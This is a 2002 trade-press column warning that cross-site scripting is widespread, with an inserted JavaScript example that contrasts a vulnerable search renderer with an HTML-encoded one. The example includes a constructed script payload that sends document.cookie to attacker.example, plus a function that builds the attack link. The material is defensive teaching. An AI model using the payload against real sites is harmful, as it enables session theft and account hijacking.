/v3-uk/news/1974109/bug-watch-new-threat-flaw
23 Oct 2002, Gunter Ollmann , V3
This week Gunter Ollmann, manager of X-Force Security Assessment Services at Internet Security Systems, warns of the dangers of cross-site scripting.
There is one class of vulnerability that appears to affect almost all dynamic web applications currently offering services over the internet.
Too many sites are vulnerable to various forms of dynamic code insertion which, with a little forethought by an attacker, can be turned into a devastating exploit. The most dangerous of these is cross-site scripting (CSS; the abbreviation XSS is now the usual one, to avoid confusion with Cascading Style Sheets).
While the potential problems and security risks associated with CSS vulnerabilities have been known for a number of years, it is only now that attackers have gained a sufficient understanding of the flaw to turn it into a serious delivery mechanism.
Organisations offering internet services have yet to fully understand how such an exploit could be used in an attack against their site.
The impact of a successful exploitation of a CSS vulnerability is dependent on the type of web application, the organisation's business offering, and the site's visitors.
Successful CSS attacks are an abuse of inherent trust: the attacker's script runs in the visitor's browser with the same privileges as the site's own pages. They have been used to harvest client session IDs and hijack accounts; they have been used as a delivery mechanism for malicious code to the client browser (such as Trojans and key loggers); and they have been used as a delivery mechanism for the execution of malicious code within the organisation.
The most successful attacks to date have been directed at the client browser. The attacker uses the CSS vulnerability to make the organisation's web application launch the attack against its own clients.
A creative attacker can thus target recent vulnerabilities in the browser being used to navigate the site, and may be able to compromise the security of the host system.
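The following is an added example, not code from the column or from Internet Security Systems. It shows the mechanism the column describes in its simplest reflected form: a search page that echoes the query string into its HTML, the link an attacker would send to a victim, and the same page with the untrusted input encoded for the HTML text context. The site name, the hostile query and the attacker host are constructed for the example (attacker.example is a reserved example domain, not a real host).

```javascript
// Added example: reflected cross-site scripting, vulnerable and hardened.

// Vulnerable renderer: the query is interpolated straight into the page,
// so markup in the query becomes part of the site's own HTML.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Encode untrusted text for the HTML text and double-quoted attribute
// contexts. Other contexts (inside <script>, inside a URL, inside CSS)
// need their own encoders; this one is not sufficient there.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened renderer: same page, same input, but encoded before insertion.
function renderSearchHardened(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Constructed attacker payload. Rendered unescaped, it runs under the
// site's origin and ships the victim's cookie (including any session ID)
// to the attacker's host via an image request.
const HOSTILE_QUERY =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// The delivery mechanism: a link to the trusted site with the payload
// URL-encoded in the query string. The victim only ever sees the trusted
// site's hostname.
function buildAttackLink(searchUrl, query) {
  return `${searchUrl}?q=${encodeURIComponent(query)}`;
}

// Crude check used to contrast the two renderers: does the output contain
// a live <script> element? A real scanner would parse the HTML and also
// look for event handlers and javascript: URLs.
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Stand-alone run for the reader.
const link = buildAttackLink("https://www.example.com/search", HOSTILE_QUERY);
console.log("attack link:", link);
console.log("vulnerable page runs script:",
  containsScriptElement(renderSearchVulnerable(HOSTILE_QUERY)));
console.log("hardened page runs script:",
  containsScriptElement(renderSearchHardened(HOSTILE_QUERY)));
```

The fix is output encoding at the point where untrusted data meets the page, chosen for the context it lands in; stripping "<script>" from the input is not a fix, since the same payload can be expressed with an event handler attribute or a javascript: URL. The check function above is deliberately crude and would miss those variants, which is the point: test the renderer, not a blocklist.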
As far as the site visitor is concerned, a trusted organisation has attacked and compromised their security.
While I know of no legal test cases as to the culpability of the 'attacking' organisation, it would be fair to say that the success of the attack is due to the lack of security and integrity of the organisation's web application.
I have now picked up the habit of checking sites I visit often for potential CSS vulnerabilities. After all, I could be their next victim.
Unfortunately, almost all the dynamic sites I visit appear to be vulnerable to these CSS attacks. The most disturbing thing for me is the lack of response on the part of these organisations when they are informed of the vulnerability.
Most of the time there is no acknowledgement of having received the advice, and in only a handful of cases is there a reply, typically along the lines of 'we don't see this as a security risk'.
Only in the rarest of cases will the organisation be pleased that you have identified a security flaw with their web application, and make any effort to rectify the problem.
From past experience, I would guess that many organisations will only respond to the threat if it is likely that they will directly suffer from the flaw.
Perhaps it will take a test case to establish a precedent or, more likely, the development of sites designed to 'name and shame' the offenders and direct their clients to safer areas.